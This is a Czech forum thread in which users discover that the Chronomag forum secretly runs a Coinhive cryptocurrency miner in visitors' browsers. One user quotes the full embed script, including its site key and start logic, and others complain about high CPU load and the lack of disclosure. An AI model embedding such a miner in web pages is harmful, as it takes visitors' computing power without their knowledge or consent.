Přejít na obsah

Virus na stránkách fóra?

Doporučené příspěvky

Odesláno

Tak mám dneska problém se stránkami tohohle fóra. Při každé jeho návštěvě mi vyskočí varovné hlášení antivirového programu:

Obsah je dostupný pouze registrovaným uživatelům. Registrace na Chronomag Fórum je zdarma.

Pokud již registraci máte, přihlaste se, prosím.

Děje se to ve všech prohlížečích (Chrome, Edge, IE). Nemáte někdo podobný problém?

• Odpovědi 430
  • Vytvořeno
  • Poslední odpověď
Odesláno

Nějaký problém asi bude,mně taky každou chvíli naskočí - Chyba spojení

Firefox nemůže navázat spojení se serverem forum.chronomag.cz.

Odesláno

Já právě o těžbě Bitcoinu nic nevím a nikdy jsem po tom ani nepátral. Tak netuším, proč můj počítač tu adresu vůbec volá.

Odesláno
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('TTJouUtb8J8NhjLT2GF3RF1dxO7x8GqS', {throttle: 0.5});

// Only start on non-mobile devices and if not opted-out
	// in the last 14400 seconds (4 hours):
	if (!miner.isMobile() && !miner.didOptOut(14400)) {
		miner.start();
	}
</script>

No ja se teda uplne nedivim, ze se to antiviru nelibi...

https://coinhive.com

Monetize Your Business With Your Users' CPU Power

Integrate Coinhive on your Website

Odesláno

AVG to hlásí proto, aby se uživatel nedivil, proč má zasekanej a pomalej počítač.

Chápu, že vydělávat se musí, ale mělo by být někde uvedený, že je v kódu tenhle skript...

Odesláno

No, musím konstatovat, že se mi ani trochu nelíbí, že si někdo bez dovolení chce vypůjčit část výpočetního výkonu mého počítače. Přeci jenom, můj procesor není z nejvýkonnějších. A ani já si nepůjčuji cizí věci bez dovolení. Ještě štěstí, že AVG to spojení zakazuje.

Odesláno

Sice tomu rozumím, ale cítím se tak nějak zhnuseně... to jsem raději pro elitářství a zaplacení nějakého "placeného statusu"  :furious:

Odesláno

Tak ja teda celkem vykonej stroj mam a chronomag si bere az 60% procesoru. Doufam, ze to zmizi co nejdriv.

bez chronomagu

Obsah je dostupný pouze registrovaným uživatelům. Registrace na Chronomag Fórum je zdarma.

s chronomagem

Odesláno

Avg to hlásí, protože je prasárna to pouštět na cizích PC bez toho aniž bych to řekl / oznámil.

Sent from my iPhone X using Tapatalk

Odesláno

A pak se každý provozovatel diví že se používá Adblock apod.

Sent from my iPhone X using Tapatalk

Archivováno

Toto téma je nyní archivováno, a proto není možné odpovídat na toto téma.

• Vytvořit...